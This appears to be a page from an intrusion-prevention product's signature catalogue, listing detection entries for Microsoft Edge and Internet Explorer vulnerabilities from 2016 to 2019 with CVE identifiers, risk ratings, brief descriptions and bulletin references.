Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Heap Overflow
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889
References:
CVE-2018-0889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0889
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0893

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1731-5242
Platform: Windows
Software: Internet Explorer
Type: Type Confusion
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-InstanceOf-Type-Confusion
References:
CVE-2018-0893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0893
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930
References:
CVE-2018-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0930
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933
References:
CVE-2018-0933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0933
Back to top

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934
References:
CVE-2018-0934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0934
Back to top

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Input Validation
Description: There has been reported an out-of-bounds vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137
References:
CVE-2018-8137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8137
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610
References:
CVE-2019-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0610
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644
References:
CVE-2019-0644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0644
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648
References:
CVE-2019-0648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0648
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652
References:
CVE-2019-0652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0652
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658
References:
CVE-2019-0658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0658
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists an out of bound write vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-PDF_Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464
References:
CVE-2018-8464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8464
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use

About this vulnerability: A Microsoft Edge PreVisitCatch Uninitialized Memory Use vulnerability
Risk: High
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A vulnerability in Microsoft Edge which allows remote attackers to execute arbitrary code, due to improper initialization of a variable within the DefineUserVars() function and an error in PreVisitCatch().
Situation: File-Text_Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use
References:
CVE-2017-8656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8656
Back to top

Microsoft-Edge-Profiledldelem-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Profiledldelem-Type-Confusion
References:
CVE-2017-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0071
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Edge-RCE-CVE-2017-0227

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-RCE-CVE-2017-0227
References:
CVE-2017-0227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0227
ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may
Back to top

Microsoft-Edge-RCE-CVE-2017-0228

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-RCE-CVE-2017-0228
References:
CVE-2017-0228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0228
ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may
Back to top

Microsoft-Edge-RCE-CVE-2017-0236

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-RCE-CVE-2017-0236
References:
CVE-2017-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0236
ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may
Back to top

Microsoft-Edge-RCE-CVE-2017-0238

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-RCE-CVE-2017-0238
References:
CVE-2017-0238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0238
ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may
Back to top

Microsoft-Edge-RCE-CVE-2017-0240

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-RCE-CVE-2017-0240
References:
CVE-2017-0240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0240
ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may
Back to top

Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote execution vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541
References:
CVE-2019-0541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0541
ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan
Back to top

Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use after free vulnerability in Microsoft Edge. A successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496
File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496-2
References:
CVE-2017-8496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8496
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497
References:
CVE-2017-8497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8497
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A successful exploitation can allow a remote attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617
References:
CVE-2017-8617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8617
ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul
Back to top

Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption
References:
CVE-2016-7240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7240
MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367
References:
CVE-2018-8367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8367
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391
References:
CVE-2018-8391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8391
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8456

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8456
References:
CVE-2018-8456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8456
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459
References:
CVE-2018-8459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8459
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8643

About this vulnerability: A vulnerability in Microsoft Edge's Scripting Engine
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists an out-of-bounds vulnerability in Internet Explorer 11. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Intenet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2018-8643
References:
CVE-2018-8643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8643
ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539

About this vulnerability: A vulnerability in Microsoft Edge's Scripting Engine
Risk: High
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539
References:
CVE-2019-0539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0539
ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565

About this vulnerability: A vulnerability in Microsoft Edge's Scripting Engine
Risk: High
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565
References:
CVE-2019-0565
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0565
ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan
Back to top

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568

About this vulnerability: A vulnerability in Microsoft Edge's Scripting Engine
Risk: High
First detected in: sgpkg-ips-1124-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568
References:
CVE-2019-0568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0568
ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan
Back to top

Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a security feature bypass vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198
References:
CVE-2016-3198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3198
MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068
Back to top

Microsoft-Edge-Spoofing-Vulnerability-2018-8383

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There is a memory vulnerability in Microsoft Edge. A remote attacker can use this to spoof the identity of a web site.
Situation: File-Text_Microsoft-Edge-Spoofing-Vulnerability-CVE-2018-8383
References:
CVE-2018-8383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8383
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Edge-Type-Confusion-CVE-2018-8588

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in the Microsoft Scripting Engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Type-Confusion-CVE-2018-8588
References:
CVE-2018-8588
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8588
ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov
Back to top

Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524

About this vulnerability: Microsoft Edge Type Confusion Remote Code Execution CVE-2017-8524 vulnerability
Risk: High
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: A Type Confusion vulnerability in Microsoft Edge which enables remote attackers to execute remote code.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524
References:
CVE-2017-8524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8524
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge. A successful exploitation causes an access violation.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601
References:
CVE-2017-8601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8601
ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951
References:
CVE-2018-0951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0951
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953
References:
CVE-2018-0953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0953
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a use-after-free vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993
References:
CVE-2018-0993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0993
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133
References:
CVE-2018-8133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8133
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179
References:
CVE-2018-8179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8179
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583
References:
CVE-2018-8583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8583
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618
References:
CVE-2018-8618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8618
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624
References:
CVE-2018-8624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8624
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Edge
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629
References:
CVE-2018-8629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8629
Back to top

Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590
References:
CVE-2019-0590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0590
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

